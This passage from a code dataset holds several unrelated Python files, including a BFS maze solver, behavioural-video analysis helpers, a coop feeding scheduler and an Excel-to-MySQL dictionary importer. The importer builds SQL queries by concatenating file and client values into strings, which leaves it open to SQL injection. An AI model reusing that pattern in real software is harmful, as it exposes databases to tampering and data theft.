7\n#######\n#...RB#\n#.#####\n#.....#\n#####.#\n#O....#\n#######\n\noutput :\n5\n\"\"\"\nimport sys\nfrom collections import deque\nsys.stdin = open(\"input.txt\", \"r\")\ninput = sys.stdin.readline\n\n\ndef move_ball(y, x, i):\n mov_cnt = 0\n dy = move[i][0]\n dx = move[i][1]\n while True:\n y += dy\n x += dx\n mov_cnt += 1\n\n if board[y][x] == '#':\n y -= dy\n x -= dx\n mov_cnt -= 1\n break\n elif board[y][x] == 'O':\n break\n\n return y, x, mov_cnt\n\n\ndef bfs():\n que = deque()\n que.append([sry, srx, sby, sbx, 0])\n visited[sry][srx][sby][sbx] = True\n\n while que:\n cry, crx, cby, cbx, mov_cnt = que.popleft()\n for i in range(4):\n nry, nrx, rmov_num = move_ball(cry, crx, i)\n nby, nbx, bmov_num = move_ball(cby, cbx, i)\n\n if board[nby][nbx] == 'O': continue\n if board[nry][nrx] == 'O':\n print(mov_cnt + 1)\n return\n\n if [nry, nrx] == [nby, nbx]:\n if rmov_num > bmov_num:\n nry -= move[i][0]\n nrx -= move[i][1]\n else:\n nby -= move[i][0]\n nbx -= move[i][1]\n\n if not visited[nry][nrx][nby][nbx]:\n visited[nry][nrx][nby][nbx] = True\n que.append([nry, nrx, nby, nbx, mov_cnt + 1])\n\n print(-1)\n return\n\n\nif __name__ == \"__main__\":\n R, C = map(int, input().rstrip().split())\n board = []\n for _ in range(R):\n board.append(list(input().rstrip()))\n\n for r in range(R):\n for c in range(C):\n if board[r][c] == 'R':\n sry, srx = r, c\n elif board[r][c] == 'B':\n sby, sbx = r, c\n elif board[r][c] == 'O':\n Oy, Ox = r, c\n\n visited = [[[[False for _ in range(C)] for _ in range(R)] for _ in range(C)] for _ in range(R)]\n move = [[0, 1], [1, 0], [0, -1], [-1, 0]]\n 
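# Editor's note (illustration, not in the original): move_ball slides a ball cell by\n    # cell until the next cell is a wall '#', then steps back one cell; reaching 'O'\n    # stops it in the hole. E.g. on row \"R..#\", rolling right moves R two cells\n    # (mov_cnt == 2) before it rests against the wall.\n    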
bfs()\n","repo_name":"AlphaTechnic/Algorithm_Study","sub_path":"2021_summer_study_for_SUAPC/day12_15653_kim.py","file_name":"day12_15653_kim.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4370893958","text":"import cv2\nimport os, glob\nimport pandas as pd\nimport numpy as np\nimport holoviews as hv\nimport FreezeAnalysis_Functions as fz\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom datetime import timedelta\nimport math\nimport random\nimport matplotlib.colors as mcolors\n\ndef convert_min_to_sec(min, sec):\n min_to_sec = int(min) * 60\n total_sec = min_to_sec + float(sec)\n return total_sec\n\ndef convert_sec_to_frames(sec, fps):\n frame_num = float(sec) * fps\n return frame_num\n\ndef break_down_timestamp(timestamp):\n \"\"\"_summary_\n\n Args:\n timestamp (str): _description_\n\n Returns:\n int: _description_\n int: _description_\n \"\"\"\n min = int(timestamp.split(\":\")[0])\n sec = int(timestamp.split(\":\")[1])\n return min, sec\n\ndef create_timestamps(start_timestamp: str, num_events: int, step: int, fps: float, units_steps, units_timestamp):\n \"\"\"_summary_\n\n Args:\n start_timestamp (str): when to start the timestamps\n num_events (int): number of events\n step (int): step size, how many frames to skip\n fps (float): frames per second of video\n units_steps (str): the units of the step size\n units_timestamp (str): the units of the start timestamp\n\n Returns:\n list: list of timestamps\n \"\"\"\n if units_timestamp == \"min\":\n min, sec = break_down_timestamp(start_timestamp)\n start_frame_num = convert_sec_to_frames(convert_min_to_sec(min, sec), fps)\n elif units_timestamp == \"sec\":\n start_frame_num = convert_sec_to_frames(start_timestamp, fps)\n\n if units_steps == \"sec\":\n step_in_frames = convert_sec_to_frames(step, fps)\n elif units_steps == \"min\":\n min, sec = break_down_timestamp(step)\n step_in_frames = convert_sec_to_frames(convert_min_to_sec(min, sec), fps) \n\n #print(\"start_frame_num: \", start_frame_num)\n #print(\"step_in_frames: \", step_in_frames)\n frame_stamps = [start_frame_num + i * step_in_frames for i in range(0, num_events)]\n #print(\"frame_stamps: \", frame_stamps)\n return frame_stamps\n\n# need 3 parameters for the following reasons:\n# 1. need to know the fps of the video - fps depends on type of video\n# 2. need to know the start time of the video - start time depends on when the video was started\n# 3. 
file_path for timing file\ndef timing_file_processing(file_path, fps, start_time_in_frames):\n df = pd.read_csv(file_path)\n #iterate through columns except trial column\n for col in list(df.columns):\n #print(list(df[col]))\n if col != \"Trial\":\n # determine if it's in min:sec format or sec format\n if \":\" in str(list(df[col])[0]):\n time_format_to_frames(df, col, fps, start_time_in_frames)\n else:\n secs_to_frames(df, col, fps, start_time_in_frames)\n\n print(df.head())\n return df\n\ndef time_format_to_frames(df: pd.DataFrame, col, fps, start_time_in_frames):\n new_lst = []\n old_lst = list(df[col])\n for i in old_lst:\n min = int(i.split(\":\")[0])\n sec = int(i.split(\":\")[1])\n min_to_sec = min * 60\n total_sec = min_to_sec + sec\n frame_num = (total_sec * fps) + start_time_in_frames\n new_lst.append(frame_num)\n df[col] = new_lst\n\ndef secs_to_frames(df: pd.DataFrame, col, fps, start_time_in_frames):\n new_lst = []\n old_lst = list(df[col])\n for i in old_lst:\n frame_num = (i * fps) + start_time_in_frames\n new_lst.append(frame_num)\n df[col] = new_lst\n\n\ndef freezing_output_processing(file_path):\n df_result = pd.read_csv(file_path)\n\n frame_list = list(df_result[\"Frame\"])\n frame_list = [i + count for count, i in enumerate(frame_list)]\n df_result[\"Frame\"] = frame_list\n\n #print(df_result.head())\n return df_result\n\ndef replace_func(x, col, timestamps):\n if x in timestamps:\n print(col)\n return col\n else:\n return x\n\n# do this after their processing\ndef freezing_alignment(df_freezing_out: pd.DataFrame, df_timing: pd.DataFrame):\n # add empty column first (zero-filled)\n df_freezing_out[\"Timestamps\"] = [0] * len(df_freezing_out)\n replace_lst = list(df_freezing_out[\"Timestamps\"])\n #print(\"here\")\n\n for col in list(df_timing.columns):\n if col != \"Trial\":\n timestamps = list(df_timing[col])\n print(\"timestamps\")\n print(timestamps)\n\n #replace_func = lambda x: col if x in timestamps else x\n new_series = df_freezing_out[\"Frame\"].apply(lambda x: replace_func(x, col, timestamps)).tolist()\n #print(new_series)\n # now replace that old timestamps col with new_series\n for idx, val in enumerate(new_series):\n if isinstance(val, str):\n replace_lst[idx] = val\n\n df_freezing_out[\"Timestamps\"] = replace_lst\n return df_freezing_out\n\ndef line_chart(x, y, outpath):\n fig, ax = plt.subplots()\n\n ax.plot(x, y)\n\n n = 1000 # every other nth tick\n for i, tick in enumerate(ax.xaxis.get_major_ticks()):\n if i % n != 0:\n tick.label1.set_visible(False)\n\n plt.show()\n fig.savefig(outpath)\n\ndef overlap_two_lists(list1, list2):\n new_lst = []\n for idx, val in enumerate(list2):\n if isinstance(val, str) and val != '0':\n new_lst.append(val)\n else:\n new_lst.append(int(list1[idx]))\n \n return new_lst\n\ndef lst_to_binary_lst(lst):\n new_lst = []\n for i in range(len(lst)):\n if lst[i] == 100:\n new_lst.append(1)\n else:\n new_lst.append(0)\n \n return new_lst\n\ndef get_proportion_freezing(freezing_sublst):\n num_freezing_points = len([i for i in freezing_sublst if i == 1])\n num_points = len(freezing_sublst)\n proportion = num_freezing_points / num_points\n\n return proportion\n\ndef bin_data(frame_lst, timestamps, freezing_lst, half_time_window, fps, event_tracked):\n binned_timestamps_lst = []\n binned_freezing_lst = []\n\n for idx, val in enumerate(timestamps):\n # everytime a timestamp is discovered this is what happens\n if val == event_tracked:\n # this means it's a timestamp, get when i happened\n time = timedelta(seconds=(frame_lst[idx] / 
fps))\n\n            # these could be floats\n            lower_bound_idx = int(idx)\n            upper_bound_idx = int(idx + (half_time_window * fps))\n\n            time_str = f\"{val}:{time} : {frame_lst[idx]}\"\n            #print(time_str)\n            binned_timestamps_lst.append(time_str)\n            #print(lower_bound_idx, upper_bound_idx)\n\n            freezing_sublst = freezing_lst[lower_bound_idx : upper_bound_idx]\n            freezing_proportion = get_proportion_freezing(freezing_sublst)\n            binned_freezing_lst.append(freezing_proportion)\n\n    return binned_timestamps_lst, binned_freezing_lst\n","repo_name":"RodrigoSandon/LBGN3","sub_path":"EzTrack/ProductStageEzTrackPipeline/EzTrackFunctions.py","file_name":"EzTrackFunctions.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
+{"seq_id":"29075364374","text":"from django.conf.urls import url\nfrom django.contrib import admin\n\nfrom .views import (\n\tCommentListAPIView,\n\tCommentCreateAPIView\n\t)\n\nurlpatterns = [\n\turl(r'^$', CommentListAPIView.as_view(), name='list'),\n\turl(r'^create/(?P<pk>\\d+)/$',CommentCreateAPIView.as_view(), name='create'),\n# \turl(r'^(?P<pk>\\d+)/$',StatusRetrieveAPIView.as_view(),name='retrieve'),\n# \turl(r'^(?P<pk>\\d+)/update/$',StatusUpdateAPIView.as_view(),name='update'),\n# \turl(r'^(?P<pk>\\d+)/destroy/$',StatusDestroyAPIView.as_view(),name='destroy'),\n]\n\napp_name = 'comments-api'","repo_name":"rajatshenoy56/Social-Media-API","sub_path":"comments/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
+{"seq_id":"6014491874","text":"\nwith open('input2.1.txt') as file:\n    s = file.read().split('\\n')\n    print(s)\n\nprint(s)\nhor = 0\nver = 0\naim = 0\nfor direction in s:\n    d, val = direction.split()\n    val = int(val)\n    if d == 'forward':\n        hor += val\n        ver += aim*val\n    if d == 'down':\n        aim += val\n    if d == 'up':\n        aim -= val\n\n\nprint(s)\n\nprint(hor*ver)\n","repo_name":"Ben-Ku/Advent_of_Code","sub_path":"Advent_of_Code_2021/2/2.1.py","file_name":"2.1.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
+{"seq_id":"41819750398","text":"import numpy\n\nimport cv2\n\nfrom Segmenter.UnetLoader import UnetLoader\nfrom Segmenter.model.StateObjectClasses import StateObjectClasses\n\n\nclass ImageStreamCreator:\n    folder_with_original_images = None\n    u_net_required_dim = 224\n    root_path_for_segmented_images = \"./Segmenter/Images/SegmentedImages\"\n    root_path_for_state_object_classes = \"./Segmenter/Images/OutputImages\"\n    video_name = None\n\n    def __init__(self, folder_with_images, video_name):\n        self.folder_with_original_images = folder_with_images\n        self.video_name = video_name\n\n    # This logic is similar to the logic in Frame AutoEncoder. 
Consider making a util for this\n def get_segmented_image_stream(self):\n if self.check_to_see_if_segmented_image_folder_exists(\n self.root_path_for_segmented_images + \"/\" + self.video_name):\n return numpy.load(self.root_path_for_segmented_images + \"/\" + self.video_name + \"/segmented.npy\")\n else:\n return self.load_original_images_and_segment()\n\n def get_original_images(self):\n matrix = self.load_images_from_a_file(self.folder_with_original_images, True)\n return matrix\n\n def check_to_see_if_segmented_image_folder_exists(self, filename):\n if cv2.os.path.isdir(filename) and len(cv2.os.listdir(filename)) > 0:\n return True\n return False\n\n def load_original_images_and_segment(self):\n matrix = self.load_images_from_a_file(self.folder_with_original_images, True)\n matrix = self.segment_image_stream(matrix)\n self.save_segmented_images(matrix, self.root_path_for_segmented_images, self.video_name)\n return matrix\n\n def load_images_from_a_file(self, folder_path, is_in_color):\n matrix = None\n num_in_matrix = 0\n file_names = cv2.os.listdir(folder_path)\n file_names.sort()\n for filename in file_names:\n if not filename.endswith(\".png\") and not filename.endswith(\".jpg\"):\n continue\n if is_in_color:\n image = cv2.imread(folder_path + \"/\" + filename, 1)\n else:\n image = cv2.imread(folder_path + \"/\" + filename, 0)\n image = cv2.resize(image, (self.u_net_required_dim, self.u_net_required_dim))\n if num_in_matrix == 0:\n if is_in_color:\n matrix = numpy.empty([len(cv2.os.listdir(folder_path)),\n self.u_net_required_dim,\n self.u_net_required_dim, 3])\n else:\n matrix = numpy.empty([len(cv2.os.listdir(folder_path)),\n self.u_net_required_dim,\n self.u_net_required_dim])\n if is_in_color:\n matrix[num_in_matrix, :, :, :] = image\n else:\n matrix[num_in_matrix, :, :] = image\n num_in_matrix += 1\n return matrix\n\n def segment_image_stream(self, original_image_matrix):\n u_net_loader = UnetLoader()\n u_net = u_net_loader.load_unet()\n return u_net.predict(original_image_matrix)\n\n # Not necessary but it makes iterations faster\n def save_segmented_images(self, segmented_matrix, folder_path, video_name):\n cv2.os.mkdir(folder_path + \"/\" + video_name)\n numpy.save(folder_path + \"/\" + video_name + \"/segmented\", segmented_matrix)\n\n def get_state_object_classes_for_training(self):\n list_of_objects = cv2.os.listdir(self.root_path_for_state_object_classes)\n list_of_objects.sort()\n class_num_and_num_pics = []\n current_class_number = 0\n images = []\n for state_objects in list_of_objects:\n one_object_matrix = self.load_images_from_a_file(\n self.root_path_for_state_object_classes + \"/\" + state_objects, True)\n images.append(one_object_matrix)\n class_num_and_num_pics.append((current_class_number, one_object_matrix.shape[0]))\n current_class_number += 1\n images = numpy.array(images)\n images = images.reshape((-1, images.shape[2], images.shape[3], images.shape[4]))\n return StateObjectClasses(images, self.build_classification_matrix(class_num_and_num_pics, images, current_class_number))\n\n\n def build_classification_matrix(self, class_num_and_num_pics, image_matrix, number_of_classes):\n classification_matrix = numpy.zeros((image_matrix.shape[0], number_of_classes))\n i = 0\n for object_index in class_num_and_num_pics:\n for row in range(object_index[1]):\n classification_matrix[i, object_index[0]] = 1\n i += 1\n return 
classification_matrix\n","repo_name":"hujohnso/AutoencoderTrainingEngine","sub_path":"Segmenter/ImageStreamCreator.py","file_name":"ImageStreamCreator.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
+{"seq_id":"24481274620","text":"import yaml\nimport schedule\nimport time\nfrom components.mg996r_servo import Servo\nfrom components.nema17_stepmotor import Stepmotor\nfrom pathlib import Path\n\ncfgpath = Path(__file__).parent / \"config.yml\"\nwith open(str(cfgpath), \"r\") as cfgfile:\n    cfg = yaml.full_load(cfgfile)\n\n\nclass Chickpi:\n    def feed(self):\n        servo = Servo()\n        servo.set_position(108)\n        time.sleep(cfg[\"feeding_factor\"])\n        servo.set_position(0)\n        servo.shutdown()\n\n    def open_door(self):\n        stepper = Stepmotor()\n        stepper.rotate(self.doorheight_to_degrees())\n        stepper.shutdown()\n\n    def close_door(self):\n        stepper = Stepmotor()\n        stepper.rotate(-self.doorheight_to_degrees())\n        stepper.shutdown()\n\n    def doorheight_to_degrees(self):\n        rotations = cfg[\"door_open_height_in_mm\"] / 25.13 # Measured spool circumference\n        return rotations * 360\n\n\n# Run it\n\nchickpi = Chickpi()\n\nschedule.every().day.at(cfg[\"opening_time\"]).do(chickpi.open_door)\nschedule.every().day.at(cfg[\"closing_time\"]).do(chickpi.close_door)\nfor feeding_time in cfg[\"feeding_times\"]:\n    schedule.every().day.at(feeding_time).do(chickpi.feed)\n\nwhile True:\n    schedule.run_pending()\n    time.sleep(60)\n","repo_name":"Joerg-Seitz/Chickpi","sub_path":"chickpi.py","file_name":"chickpi.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
+{"seq_id":"28174351489","text":"#!/usr/bin/env python3\nfrom subprocess import Popen\nimport os\nfrom sys import exit\nfrom urllib.parse import unquote, urlparse\nimport dbus\nbus = dbus.SessionBus()\n\nclass GrabSong(object):\n    def __init__(self, player):\n        self.start = True\n        self.player = player\n        self.player_proper_name = None\n        self.song_changed = True\n        self.metadata = self.get_metadata()\n        self.curdir = os.path.dirname(os.path.realpath(__file__))\n        self.outdir = \"%s/Output\" % self.curdir\n        self.outfiles = [\"Artist\", \"Album\", \"Title\"]\n        self.song_art = None\n\n    def get_metadata(self):\n        try:\n            data = bus.get_object(\"org.mpris.MediaPlayer2.%s\" % self.player,\n                                  '/org/mpris/MediaPlayer2')\n        except dbus.exceptions.DBusException as e:\n            if e._dbus_error_name.endswith(\"ServiceUnknown\"):\n                print(\"Unknown service. 
Please make sure there is no typo and that the media player is started.\")\n exit(1)\n\n interface = dbus.Interface(data, dbus_interface=\"org.freedesktop.DBus.Properties\")\n metadata = interface.Get(\"org.mpris.MediaPlayer2.Player\", \"Metadata\")\n\n try:\n art_uri = str(metadata[\"mpris:artUrl\"])\n if art_uri.startswith(\"file://\"):\n path = urlparse(art_uri)\n self.song_art = unquote(os.path.abspath(os.path.join(path.netloc, path.path)))\n else:\n self.song_art = None\n except:\n self.song_art = None\n\n self.player_proper_name = interface.Get(\"org.mpris.MediaPlayer2\", \"Identity\")\n\n returned_value = {}\n\n try:\n returned_value[\"Artist\"] = metadata[\"xesam:artist\"][0]\n except:\n returned_value[\"Artist\"] = \"\"\n\n try:\n returned_value[\"Album\"] = metadata[\"xesam:album\"]\n except:\n returned_value[\"Album\"] = \"\"\n\n try:\n returned_value[\"Title\"] = metadata[\"xesam:title\"]\n except:\n returned_value[\"Title\"] = \"\"\n\n if self.song_changed == False:\n self.song_changed = self.metadata[\"Artist\"] != returned_value[\"Artist\"] and self.metadata[\"Album\"] != returned_value[\"Album\"] and self.metadata[\"Title\"] != returned_value[\"Title\"]\n\n return returned_value\n\n def save(self):\n try:\n os.makedirs(self.outdir)\n except OSError:\n if os.path.isdir(self.outdir):\n pass\n else:\n raise\n\n for name in self.outfiles:\n with open(\"%s/Song%s.txt\" % (self.outdir, name), \"w\") as f:\n f.write(self.metadata[name])\n if not self.song_art:\n self.song_art = \"%s/Images/NoArt.jpg\" % self.curdir\n\n Popen(\n [\n \"convert\",\n self.song_art, \"-resize\", \"500x500!\",\n self.outdir + \"/AlbumArt.jpg\"\n ]\n )\n\n def update(self):\n try:\n self.metadata = self.get_metadata()\n\n for typ in self.outfiles:\n try:\n if self.metadata[typ]:\n pass\n except KeyError:\n self.metadata[typ] = \"No information available.\"\n\n if self.song_changed or self.start is True:\n self.start = False\n self.song_changed = False\n self.save()\n except KeyError:\n self.metadata = \"No valid metadata detected.\"\n","repo_name":"aFoxNamedMorris/pygrab-song","sub_path":"GrabSong.py","file_name":"GrabSong.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"6648393062","text":"from django.utils import timezone\nfrom django.db.models import F\nfrom milk.models import Tracker\n\ndef update_days():\n tracker = Tracker.objects.get(id=1)\n \n today = timezone.now().day\n\n if timezone.now().hour == 2 and tracker.total_days < today:\n tracker.total_days = F(\"total_days\") + 1\n tracker.save()\n print(\"UPDATED\")","repo_name":"karimdevelops/django-expense-tracker","sub_path":"jobs/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"30291429984","text":"#scorekeeping is currently disconnected from everything because idk how to connect it\ndef scoreTest():\n p1score = 0\n p2score = 0\n printScore(p1score, p2score)\n\n while True: \n player = input(\"Which player scored? 
(1 or 2)\")\n amount = int(input(\"How many points did they score\"))\n\n if player == \"1\":\n p1score= changeScore(p1score, amount)\n\n elif player == \"2\":\n p2score= changeScore(p2score, amount)\n \n else:\n print(\"enter a real player pls\")\n\n printScore(p1score, p2score)\n\n #Returns player number if they win by getting over 15 points\n if p1score >= 15:\n print(\"player one wins!\")\n break\n\n if p2score >= 15:\n print(\"player two wins!\")\n break\n\n# Changes only player one or player two's score based on changeAmount, then returns the new score\ndef changeScore(changeAmount, currentScore):\n #returns player one's new changed score\n return (currentScore + changeAmount) \n\n#prints both players scores\ndef printScore(playerOneScore, playerTwoScore):\n\n print (\"Player One's score is :\", playerOneScore)\n print (\"Player Two's score is :\", playerTwoScore)\n\nscoreTest()","repo_name":"AkashaSnow/LightsaberScoring_GalacticSaber","sub_path":"GalacticSaber/matchscoring/scoreKeeping.py","file_name":"scoreKeeping.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"13521569573","text":"def quick(x, first, last):\n if first < last:\n pivot = first\n i = first\n j = last\n while i < j:\n while x[i] <= x [pivot] and i < last:\n i += 1\n while x[j] > x[pivot]:\n j -= 1\n if i < j:\n x[i],x[j] = x[j],x[i]\n x[pivot],x[j] = x[j],x[pivot]\n quick(x,first,j-1)\n quick(x,j+1,last)\n \n \nt = int(input())\na = []\nfor i in range(0,t):\n a.append(int(input()))\nquick(a,0,t-1)\nprint (a)\n \n \n \n \n \n \n","repo_name":"ayusinghi96/CodeChefPrograms","sub_path":"TSORT(quick sort).py","file_name":"TSORT(quick sort).py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35870310315","text":"#implementation for understanding\nclass HshTbl:\n def __init__(self, size):\n self.data = [[]]*size\n\n def __hash(self, key) -> int:\n hsh = 0\n for i in range(len(key)):\n hsh = (hsh + ord(key[i]) * i) % len(self.data)\n return hsh\n\n def set(self, key, value) -> None:\n address = self.__hash(key)\n self.data[address] = self.data[address] + [[key, value]]\n return self.data\n\n\n def get(self, key):\n address = self.__hash(key)\n for i in range(len(self.data[address])):\n if self.data[address][i][0] == key:\n return self.data[address][i][1]\n return None\n\n def keys(self):\n ex_array = []\n for backet_pool in self.data:\n if backet_pool:\n for cur_backet in backet_pool:\n ex_array.append(cur_backet[0])\n return ex_array\n\n\n\nhtbl = HshTbl(10)\n\nhtbl.set(\"some\", 552)\nhtbl.set(\"value\", 15)\nhtbl.set(\"test\", \"aboba\")\nhtbl.set(\"planes\", 2000)\n\nprint(htbl.keys())","repo_name":"ShchekodinNA/Data-structures-and-algoritms","sub_path":"Data structures/Hash_Tables/Implementing_hash table.py","file_name":"Implementing_hash table.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37125480287","text":"__author__ = 'swallow'\n__language__= 'python 3.0'\n#! 
/usr/bin/python\n#coding:utf-8\nimport logging\nimport os\nimport sys\nimport time\n\nimport xlrd\n\nfrom .DictionaryDB import MysqlDb\nfrom .string_tools import replace_single_quotation\nfrom .updateLanguageData import updateAllwordsData\n\nKEYWORD_COL_NO = 0\nTABLE_NAME_ALLWORDS = 'allwords_list'\nTABLE_NAME_PROC = 'proc_list'\nTABLE_NAME_LANGUAGE = 'language_table'\n\nSHEET_NAME = \"word_list\"\n\nSTATUS_PROCESS_WAIT = 0\nSTATUS_PROCESSING = 1\nSTATUS_PROCESS_FINSHED = 2\n\nSTATUS_PROCESS_ERROR = -1\n\nclass ImportProcessInfo:\n m_rowCount = 0\n m_processedRowNumber = 0\n m_process_status = STATUS_PROCESS_WAIT\n m_process_language = ''\n m_process_comment = None\n\n\n\ng_myProcInfoList = {}\n\ndef import_excel_dictionary(excel_file, client_info, update_interpre_flag, update_ip, update_user):\n proc_id = client_info.get_proc_id()\n if proc_id is None:\n return\n\n myProcInfo = ImportProcessInfo()\n myProcInfo.m_rowCount = 0\n myProcInfo.m_processedRowNumber = 0\n myProcInfo.m_process_status = STATUS_PROCESS_WAIT\n myProcInfo.m_process_comment = 'Waiting for processing'\n\n mydb = MysqlDb()\n mydb.initDB()\n\n\n g_myProcInfoList[proc_id] = myProcInfo\n\n filename = os.path.join(os.getcwd(), excel_file)\n try:\n book = xlrd.open_workbook(excel_file)\n sheet = book.sheet_by_name(SHEET_NAME)\n\n language_string = sheet.cell(0, KEYWORD_COL_NO).value\n myProcInfo.m_rowCount = sheet.nrows\n myProcInfo.m_process_status = STATUS_PROCESSING\n myProcInfo.m_process_comment = 'Start processing'\n\n language_id = sheet.cell(0,0).value\n myProcInfo.m_process_language = language_id\n\n i = 1\n insert_item_count = 0\n while (i < myProcInfo.m_rowCount):\n keyword = sheet.cell(i, 0).value\n word_interpre = \"\"\n if (sheet.ncols > 1):\n word_interpre = sheet.cell(i, 1).value\n\n if keyword is None:\n break\n else:\n keyword_in_sql = replace_single_quotation(str(keyword))\n select_sql = \"SELECT * FROM \" + TABLE_NAME_ALLWORDS + \" WHERE entry = '\" + keyword_in_sql + \"' ;\"\n # print (select_sql)\n dataResult = mydb.select_data(select_sql)\n # print(number)\n if (dataResult['num'] == 0):\n # \"INSERT INTO podcast_keyword_dictionary VALUES (null,'aaaaa','en-gb','2018/1/9');\"\n localtime = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n # print(\"current timestamp is :\", localtime)\n\n sql = \"INSERT INTO \" + TABLE_NAME_ALLWORDS + \" VALUES (null,'\" + keyword_in_sql + \"','\" \\\n + word_interpre +\"','\" + language_string + \"','\" + localtime \\\n + \"', null, null, '\" + update_ip + \"', '\" + update_user + \"');\"\n print(sql)\n param = ('test@test.org', 'very-secret')\n mydb.insert_data(sql, None)\n insert_item_count += 1\n else:\n if (update_interpre_flag == 'on'):\n if word_interpre is not None:\n stringID = dataResult['result'][0][0]\n word_interpre_in_sql = replace_single_quotation(str(word_interpre))\n updateAllwordsData(stringID, keyword, word_interpre, update_ip, update_user)\n\n else:\n print(keyword_in_sql + \" already existed.\")\n\n myProcInfo.m_processedRowNumber = i\n i += 1\n\n myProcInfo.m_process_status = STATUS_PROCESS_FINSHED\n myProcInfo.m_process_comment = 'Normal finshed'\n\n mydb.close_connect()\n\n base_excel_file = os.path.basename(excel_file)\n saveClientInfoToDB(language_id, base_excel_file, insert_item_count, client_info)\n insertLanguageDB(language_id, base_excel_file, update_ip, update_user)\n del g_myProcInfoList[proc_id]\n\n return True\n except Exception as e:\n logging.exception(e)\n myProcInfo.m_process_status = STATUS_PROCESS_ERROR\n 
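# Editor's note (suggestion, not in the original): e.args can be empty, in which\n        # case e.args[0] below raises IndexError itself; str(e) is the safer way to\n        # capture the message, e.g. myProcInfo.m_process_comment = str(e).\n        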
myProcInfo.m_process_comment = e.args[0]\n mydb.close_connect()\n\n return False\n\ndef saveClientInfoToDB(language_id, excel_file, insert_item_count, client_info):\n proc_id = client_info.get_proc_id()\n if proc_id is None:\n return\n\n mydb = MysqlDb()\n mydb.initDB()\n\n ip_address = client_info.get_ipaddress()\n city_name = client_info.get_city()\n region_name = client_info.get_region()\n country_name = client_info.get_country()\n latitude = client_info.get_latitude()\n longitude = client_info.get_longitude()\n time_zone = client_info.get_timezone()\n\n\n select_sql = \"SELECT * FROM \" + TABLE_NAME_PROC + \" WHERE proc_id = '\" + proc_id + \"' ;\"\n # print (select_sql)\n number = mydb.select_data(select_sql)\n # print(number)\n if (number['num'] == 0):\n localtime = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n\n sql = \"INSERT INTO \" + TABLE_NAME_PROC + \" VALUES ('\" + language_id + \"','\" + excel_file + \"', \" + str(insert_item_count) + \",'\" +\\\n proc_id + \"','\" + ip_address + \"','\" + city_name + \"','\" + region_name + \"','\" + country_name + \\\n \"','\" + latitude + \"','\" + longitude + \"','\" + time_zone + \"','\" + localtime + \"');\"\n print(sql)\n param = ('test@test.org', 'very-secret')\n mydb.insert_data(sql, None)\n else:\n print(\" proc \" + proc_id + \" already existed. Wrong import task\")\n\n mydb.close_connect()\n\ndef findInDB(proc_id):\n mydb = MysqlDb()\n mydb.initDB()\n select_sql = \"SELECT * FROM \" + TABLE_NAME_PROC + \" WHERE proc_id = '\" + proc_id + \"' ;\"\n number = mydb.select_data(select_sql)\n mydb.close_connect()\n # print(number)\n return number\n\n\ndef getCurrentProcessRate(proc_id):\n procInfo = g_myProcInfoList.get(proc_id, None)\n if procInfo is None:\n data = findInDB(proc_id)\n result = data['result']\n num = data['num']\n if num > 0:\n return 100\n else:\n return 0\n elif procInfo.m_rowCount is 0:\n return 0\n else:\n return (int((procInfo.m_processedRowNumber * 100)/procInfo.m_rowCount))\n\ndef getCurrentProcessStatus(proc_id):\n procInfo = g_myProcInfoList.get(proc_id, None)\n if procInfo is None:\n data = findInDB(proc_id)\n result = data['result']\n num = data['num']\n if num > 0:\n return STATUS_PROCESS_FINSHED\n else:\n return STATUS_PROCESS_WAIT\n\n return procInfo.m_process_status\n\ndef getCurrentProcessComment(proc_id):\n procInfo = g_myProcInfoList.get(proc_id, None)\n if procInfo is None:\n data = findInDB(proc_id)\n result = data['result']\n num = data['num']\n if num > 0:\n return 'Normal finshed'\n else:\n return 'Not started'\n\n return procInfo.m_process_comment\n\ndef getCurrentProcessLanguage(proc_id):\n procInfo = g_myProcInfoList.get(proc_id, None)\n if procInfo is None:\n data = findInDB(proc_id)\n result = data['result']\n num = data['num']\n\n if num > 0:\n return result[0][0]\n else:\n return \"null\"\n\n return procInfo.m_process_language\n\ndef insertLanguageDB(language_id, language_file, update_ip, update_user):\n\n mydb = MysqlDb()\n mydb.initDB()\n\n select_sql = \"SELECT * FROM \" + TABLE_NAME_LANGUAGE + \" WHERE language_id = '\" + language_id + \\\n \"' and language_file = '\" + language_file + \"';\"\n\n result = mydb.select_data(select_sql)\n if (result['num'] == 0):\n sql = \"INSERT INTO \" + TABLE_NAME_LANGUAGE + \" VALUES ('\" \\\n + language_id + \"','\" + language_file + \"','\"+ update_ip +\"', '\" + update_user + \"');\"\n param = ('test@test.org', 'very-secret')\n mydb.insert_data(sql, None)\n\n mydb.close_connect()\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 1:\n print( 
